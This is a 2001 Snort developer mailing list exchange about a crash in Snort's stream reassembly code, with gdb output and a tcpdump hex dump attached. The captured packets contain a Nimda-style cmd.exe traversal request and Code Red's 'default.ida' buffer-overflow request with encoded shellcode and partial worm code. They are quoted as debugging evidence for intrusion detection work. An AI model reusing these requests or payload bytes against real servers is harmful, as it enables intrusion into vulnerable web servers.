[Snort-devel] Re: Version 1.8.3 (Build 87)

Martin Roesch roesch at ...402...
Tue Nov 20 12:54:13 EST 2001


Hi Phil,
     Keep going on it, I've seen that problem before but I haven't
really tracked it too heavily yet.  If you've got a packet file, I
wouldn't mind having a look at it too...

     -Marty

Phil Wood wrote:
> 
> Marty,
> 
> I've got a "-b" file which, when passed through snort like so:
> 
>   run -r last.CR-causescore  -N -q -A fast -o -c /tmp/CR.conf -F /tmp/bpf
> 
> gets a:
> 
>   Program received signal SIGSEGV, Segmentation fault.
> 0x807cdc9 in StoreStreamPkt (ssn=0x8c7fba8, p=0xbffff1a0, pkt_seq=3314385064)
>     at spp_stream4.c:2602
> 2602        returned = (StreamPacketData *) ubi_sptFind(s->dataPtr, (ubi_btItemPtr)spd);
> 
> I'm in the throes of zeroing in on the problem.  Have you already seen this?
> Or, should I keep throe'n?
> 
> Later,
> 
> Phil
> 
> PS: I gave snort a bpf filter of "ip", cause snort is also formating
> packets with nimda data, but 0 in the beginning of the packet.  Hex at bottom
> of this message.
> 
> PSS: I sent you a brief mention of this a while back, but think it went
> to an old address of yours.
> 
> ==============================  gdb  info  ===================================
> (gdb) list
> 2597            return;
> 2598        }
> 2599
> 2600
> 2601        /* check for retransmissions */
> 2602        returned = (StreamPacketData *) ubi_sptFind(s->dataPtr, (ubi_btItemPtr)spd);
> 2603
> 2604        if(returned != NULL)
> 2605        {
> 2606            if(returned->payload_size == p->dsize &&
> (gdb) print *s
> Cannot access memory at address 0x8c7fbf0
> (gdb) print *p
> $1 = {pkth = 0xbffff640, pkt = 0x8158042 "", fddihdr = 0x0, fddisaps = 0x0,
>   fddisna = 0x0, fddiiparp = 0x0, fddiother = 0x0, trh = 0x0, trhllc = 0x0,
>   trhmr = 0x0, sllh = 0x0, eh = 0x8158042, vh = 0x0, ehllc = 0x0,
>   ehllcother = 0x0, ah = 0x0, iph = 0x8158050, orig_iph = 0x0,
>   ip_options_len = 0, ip_options_data = 0x0, tcph = 0x8158064,
>   orig_tcph = 0x0, tcp_options_len = 0, tcp_options_data = 0x0, udph = 0x0,
>   orig_udph = 0x0, icmph = 0x0, orig_icmph = 0x0, ext = 0x0,
>   data = 0x8158078 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\r\nHost: www\r\nConnnection: close\r\n\r\nnnnection: close\r\n\r\nr HTTP/1.0\r\nHost: www\r\nConnnection: close\r\n\r\n", dsize = 80, frag_flag = 0 '\000', frag_offset = 0,
>   mf = 0 '\000', df = 1 '\001', rf = 0 '\000', sp = 2292, dp = 80,
>   orig_sp = 0, orig_dp = 0, caplen = 0, URI = {uri = 0x0, length = 0},
>   ssnptr = 0x8c7fba8, ip_options = {{code = 0 '\000', len = 0,
>       data = 0x0} <repeats 40 times>}, ip_option_count = 0,
>   ip_lastopt_bad = 0 '\000', tcp_options = {{code = 0 '\000', len = 0,
>       data = 0x0} <repeats 40 times>}, tcp_option_count = 0,
>   tcp_lastopt_bad = 0 '\000', csum_flags = 0 '\000', packet_flags = 4}
> (gdb) print *ssn
> $2 = {Node = {Link = {0x0, 0x0, 0x0}, gender = 0 '\000', balance = 0 '\000'},
>   server = {ip = 135632744, port = 38814, state = 21 '\025', isn = 1006263450,
>     current_seq = 268748, base_seq = 134, last_ack = 134, win_size = 32936,
>     pkts_sent = 8781904, bytes_sent = 10331, data = {root = 0x0, cmp = 0,
>       count = 17, flags = -24 'è'}, dataPtr = 0x401b2d10}, client = {
>     ip = 791686704, port = 17, state = 0 '\000', isn = 134583936,
>     current_seq = 138430712, base_seq = 0, last_ack = 17, win_size = 38692,
>     pkts_sent = 138437616, bytes_sent = 0, data = {root = 0x19, cmp = 0xa580,
>       count = 65535, flags = 0 '\000'}, dataPtr = 0x8406120}, start_time = 0,
>   last_session_time = 521, session_flags = 138431272}
> (gdb)
> 
> ===============================  headers sorely lacking ======================
> tcpdump -n -r last.CR-causescore -x -s 1514 -c 1 not ip | hextotex
> 1 packets received by filter
> 00:02:03.211737 0:0:0:0:0:0 > 0:0:0:0:0:0 sap 00 I (s=0,r=0,C) len=1500
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000a77  00508480 :                w P   :
>   5b33ec41  caf15018  77c40000  00000000  00000000 : {3 A  P w            :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00000000  00000000 :                      :
>   00000000  00000000  00000000  00004745  54202f64 :               GET /d :
>   65666175  6c742e69  64613f4e  4e4e4e4e  4e4e4e4e : efault.ida?NNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e4e : NNNNNNNNNNNNNNNNNNNN :
>   4e4e4e4e  4e4e4e4e  4e4e4e4e  4e4e4e00  00000000 : NNNNNNNNNNNNNNN      :
>   00000000  00000000  0000c303  00000078  00fa2025 :                x   % :
>   75393039  30257536  38353825  75636264  33257537 : u9090%u6858%ucbd3%u7 :
>   38303125  75393039  30257536  38353825  75636264 : 801%u9090%u6858%ucbd :
>   33257537  38303125  75393039  30257539  30393025 : 3%u7801%u9090%u9090% :
>   75383139  30257530  30633325  75303030  33257538 : u8190%u00c3%u0003%u8 :
>   62303025  75353331  62257535  33666625  75303037 : b00%u531b%u53ff%u007 :
>   38257530  30303025  7530303d  61202048  5454502f : 8%u0000%u00=a  HTTP/ :
>   312e300d  0a436f6e  74656e74  2d747970  653a2074 : 1.0  Content-type: t :
>   6578742f  786d6c0a  484f5354  3a777777  2e776f72 : ext/xml HOST:www.wor :
>   6d2e636f  6d0a2041  63636570  743a202a  2f2a0a43 : m.com  Accept: */* C :
>   6f6e7465  6e742d6c  656e6774  683a2033  35363920 : ontent-length: 3569  :
>   0d0a0d0a  558bec81  ec180200  00535657  8dbde8fd :     U        SVW     :
>   ffffb986  000000b8  cccccccc  f3abc785  70feffff :                 p    :
>   00000000  e90a0b00  008f8568  feffff8d  bdf0feff :            h         :
>   ff64a100  00000089  47086489  3d000000  00e96f0a :  d      G d =     o  :
>   00008f85  60feffff  c785f0fe  ffffffff  ffff8b85 :     `                :
>   68feffff  83e80789  85f4feff  ffc78558  feffff00 : h              X     :
>   00e077e8  9b0a0000  83bd70fe  ffff000f  85dd0100 :   w       p          :
>   008b8d58  feffff81  c1000001  00898d58  feffff81 :    X           X     :
>   bd58feff  ff000000  78750ac7  8558feff  ff0000f0 :  X      xu   X       :
>   bf8b9558  feffff33  c0668b02  3d4d5a00  000f859a :    X   3 f  =MZ      :
>   0100008b  8d58feff  ff8b513c  8b8558fe  ffff33c9 :      X    Q<  X   3  :
>   668b0c10  81f95045  00000f85  79010000  8b9558fe : f     PE    y     X  :
>   ffff8b42  3c8b8d58  feffff8b  54017803  9558feff :    B<  X    T x  X   :
>   ff899554  feffff8b  8554feff  ff8b480c  038d58fe :    T     T    H   X  :
> =========================  end-o-stuff =======================================

--
Martin Roesch - President, Sourcefire Inc. - (410)552-6999
roesch at ...402... - http://www.sourcefire.com  
Snort: Open Source Network IDS - http://www.snort.org




More information about the Snort-devel mailing list